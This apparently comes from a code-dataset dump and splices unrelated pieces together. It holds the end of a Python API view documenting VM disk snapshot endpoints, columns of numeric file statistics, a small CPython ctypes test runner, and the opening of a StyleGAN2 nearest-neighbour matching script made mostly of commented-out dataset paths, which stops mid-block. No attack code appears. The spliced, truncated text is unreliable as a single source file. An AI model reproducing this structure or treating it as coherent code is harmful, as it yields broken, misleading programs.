synchronize (:http:put:`PUT </vm/(hostname_or_uuid)/snapshot>`) snapshots of VM's disk on compute node
with snapshots saved in database.
Delete (:http:delete:`DELETE </vm/(hostname_or_uuid)/snapshot>`) VM snapshots specified
by the list (data.snapnames).
.. http:get:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.full: Return list of objects with all snapshot details (default: false)
:type data.full: boolean
:arg data.disk_id: Filter by disk number/ID
:type data.disk_id: integer
:arg data.type: Filter by snapshot type (1 - Automatic, 2 - Manual)
:type data.type: integer
:arg data.define: Filter by snapshot definition name
:type data.define: string
:arg data.order_by: :ref:`Available fields for sorting <order_by>`: ``name``, ``disk_id``, \
``size``, ``created`` (default: ``-created``)
:type data.order_by: string
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id / Invalid snapshot type
.. http:put:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
:status 428: VM is not installed
.. http:delete:: /vm/(hostname_or_uuid)/snapshot
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg data.snapnames: **required** - List of snapshot names to be deleted
:type data.snapnames: array
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 412: Invalid snapnames / Invalid disk_id
:status 417: VM snapshot status is not OK
:status 423: Node is not operational / VM is not operational
:status 428: VM is not installed
"""
return VmSnapshotList(request, hostname_or_uuid, data).response()
#: vm_status: GET:
#: vm_status: POST: running, stopped, stopping
#: vm_status: PUT: stopped
#: vm_status:DELETE: running, stopped, stopping
@api_view(('GET', 'POST', 'PUT', 'DELETE'))
@request_data() # get_vm() = IsVmOwner
@setting_required('VMS_VM_SNAPSHOT_ENABLED')
def vm_snapshot(request, hostname_or_uuid, snapname, data=None):
"""
Show (:http:get:`GET </vm/(hostname_or_uuid)/snapshot/(snapname)>`),
create (:http:post:`POST </vm/(hostname_or_uuid)/snapshot/(snapname)>`),
destroy (:http:delete:`DELETE </vm/(hostname_or_uuid)/snapshot/(snapname)>`) or
rollback (:http:put:`PUT </vm/(hostname_or_uuid)/snapshot/(snapname)>`)
a snapshot of VM's disk.
.. http:get:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 412: Invalid disk_id
.. http:post:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.note: Snapshot comment
:type data.note: string
:arg data.fsfreeze: Whether to send filesystem freeze command to QEMU agent socket before \
creating snapshot (requires QEMU Guest Agent) (default: false)
:type data.fsfreeze: boolean
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found
:status 406: Snapshot already exists
:status 412: Invalid disk_id
:status 423: Node is not operational / VM is not operational
:status 417: VM snapshot limit reached / VM snapshot size limit reached / DC snapshot size limit reached
:status 428: VM is not installed
.. http:put:: /vm/(hostname_or_uuid)/snapshot/(snapname)
.. warning:: A snapshot rollback will restore disk data from the snapshot; \
All data created after the snapshot will be lost (including all newer snapshots)!
.. warning:: When restoring a snapshot into another server's disk all existing snapshots \
on the target server will be lost!
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes| - Rollback snapshot
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:arg data.force: Force recursive rollback (default: true)
:type data.force: boolean
:arg data.target_hostname_or_uuid: Target server hostname or uuid \
(default: source and destination server are the same)
:type data.target_hostname_or_uuid: string
:arg data.target_disk_id: Target disk number/ID; Makes sense (and required) only when \
``target_hostname_or_uuid`` is specified (default: not used, because the snapshot is restored on the same disk ID)
:type data.target_disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 409: VM has pending tasks
:status 412: Invalid disk_id
:status 417: VM snapshot status is not OK / VM has more recent snapshots (force=false) / \
Target VM has snapshots (force=false and target_hostname_or_uuid is set)
:status 423: Node is not operational / VM is not operational / VM is not stopped / VM is locked or has slave VMs
:status 428: VM is not installed/ VM brand mismatch / Disk size mismatch
.. http:put:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-no| - Update snapshot note
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.note: **required** - Snapshot comment
:type data.note: string
:status 200: SUCCESS
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
.. http:delete:: /vm/(hostname_or_uuid)/snapshot/(snapname)
:DC-bound?:
* |dc-yes|
:Permissions:
* |VmOwner|
:Asynchronous?:
* |async-yes|
:arg hostname_or_uuid: **required** - Server hostname or uuid
:type hostname_or_uuid: string
:arg snapname: **required** - Snapshot name
:type snapname: string
:arg data.disk_id: **required** - Disk number/ID (default: 1)
:type data.disk_id: integer
:status 200: SUCCESS
:status 201: PENDING
:status 400: FAILURE
:status 403: Forbidden
:status 404: VM not found / Snapshot not found
:status 412: Invalid disk_id
:status 417: VM snapshot status is not OK
:status 423: Node is not operational / VM is not operational
"""
return VmSnapshot(request, hostname_or_uuid, snapname, data).response()
| 40.82766
| 120
| 0.636875
| 2,366
| 19,189
| 5.022401
| 0.101437
| 0.064798
| 0.090718
| 0.033662
| 0.820247
| 0.801397
| 0.772869
| 0.760498
| 0.718169
| 0.711605
| 0
| 0.019309
| 0.252384
| 19,189
| 469
| 121
| 40.914712
| 0.809006
| 0.74871
| 0
| 0.410714
| 0
| 0
| 0.120921
| 0.067308
| 0
| 0
| 0
| 0.004264
| 0
| 1
| 0.089286
| false
| 0
| 0.178571
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
730daf2050dff29afc293bab7dc3c14330e6afd3
| 193
|
py
|
Python
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 207
|
2018-10-01T08:53:01.000Z
|
2022-03-14T12:15:54.000Z
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 8
|
2019-06-29T14:18:51.000Z
|
2022-02-19T07:30:27.000Z
|
toolchain/riscv/MSYS/python/Lib/test/test_ctypes.py
|
zhiqiang-hu/bl_iot_sdk
|
154ee677a8cc6a73e6a42a5ff12a8edc71e6d15d
|
[
"Apache-2.0"
] | 76
|
2020-03-16T01:47:46.000Z
|
2022-03-21T16:37:07.000Z
|
import unittest
from test.support import import_module
ctypes_test = import_module('ctypes.test')
load_tests = ctypes_test.load_tests
if __name__ == "__main__":
unittest.main()
| 19.3
| 43
| 0.740933
| 25
| 193
| 5.16
| 0.48
| 0.232558
| 0.27907
| 0.341085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170984
| 193
| 9
| 44
| 21.444444
| 0.80625
| 0
| 0
| 0
| 0
| 0
| 0.103261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
73273f3f91426eb2164d8b8a7c4607e98f96daf2
| 34,146
|
py
|
Python
|
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | 2
|
2021-11-11T00:18:28.000Z
|
2021-12-28T01:10:25.000Z
|
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | null | null | null |
stylegan2/NN_getDist_testCode_forStylegan2.py
|
chenqiguo/GAN_replication
|
18e71914164f0d735354afb0134ce00570080ecd
|
[
"OLDAP-2.3"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 23 16:09:15 2020
@author: guo.1648
"""
# referenced from NN_query_testCode_forStylegan2.py,
# and NN_getDist_testCode_forBiggan.py.
# this code is for stylegan2 sample sheet.
# this code also do 1 NN matching for the generated images and the original images,
# but the purpose is to compute the corresponding matching distance for each result,
# and then use these matching distances and human perception for each mathing pair,
# to find out the NN distance threshold which is the largest matching distance satisfying
# 100% perceptual replication.
# Note: we will combine this stylegan2 result and the biggan result to find out the threshold!
import cv2
import os
import numpy as np
#from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestNeighbors
#from skimage import img_as_ubyte
#import torchvision.transforms as transforms
"""
#### for FLOWER_128: 8189 images dataset (the original FLOWER dataset)
src_sampleSheetImg = '/scratch/stylegan2/results/results_FLOWER_128/00000-stylegan2-FLOWER_128-1gpu-config-f/fakes002526.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes002526/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128: 8189 images dataset (the original FLOWER dataset)
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/fakes001925.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128/fakes001925/NNmatchDist.txt'
"""
"""
#### for FLOWER_128_sub1000: 1000 images dataset (resume)
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub1000_resume/00000-stylegan2-FLOWER_128_sub1000-1gpu-config-f/fakes003248.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub1000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub1000/00000-stylegan2-FLOWER_128_sub1000-1gpu-config-f/fakes001684.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub1000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchDist.txt'
"""
"""
#### for FLOWER_128_sub4000: 4000 images dataset (resume)
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub4000_resume/00000-stylegan2-FLOWER_128_sub4000-1gpu-config-f/fakes003248.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub4000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub4000/00000-stylegan2-FLOWER_128_sub4000-1gpu-config-f/fakes001925.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub4000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub200: 200 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub200/00000-stylegan2-CelebA_128_sub200-1gpu-config-f/fakes007700.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub200/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub600: 600 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub600/00000-stylegan2-CelebA_128_sub600-1gpu-config-f/fakes005414.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub600/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub1000/00000-stylegan2-CelebA_128_sub1000-1gpu-config-f/fakes004933.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub1000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub4000/00000-stylegan2-CelebA_128_sub4000-1gpu-config-f/fakes003369.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub4000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub8000: 8000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub8000/00000-stylegan2-CelebA_128_sub8000-1gpu-config-f/fakes001684.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub8000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub10000/00002-stylegan2-MNIST_128_sub10000-1gpu-config-f/fakes005173.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub10000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub10000: 10000 images dataset, bi:
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub10000/00002-stylegan2-MNIST_128_sub10000-1gpu-config-f/fakes005173.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub10000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub30000: 30000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub30000/00000-stylegan2-MNIST_128_sub30000-1gpu-config-f/fakes005053.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub30000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub30000: 30000 images dataset, bi:
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub30000/00000-stylegan2-MNIST_128_sub30000-1gpu-config-f/fakes005053.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub30000_bi/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchDist.txt'
"""
"""
#### for MNIST_128_train: 60000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_train/00000-stylegan2-MNIST_128_train-1gpu-config-f/fakes003609.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/data/MNIST/resized/train/train_60000/' # these images are just the whole MNIST resized training set
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub10000/00000-stylegan2-LSUN_128_sub10000-1gpu-config-f/fakes004812.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub10000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub30000: 30000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub30000/00020-stylegan2-LSUN_128_sub30000-1gpu-config-f/fakes004692.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub30000/'
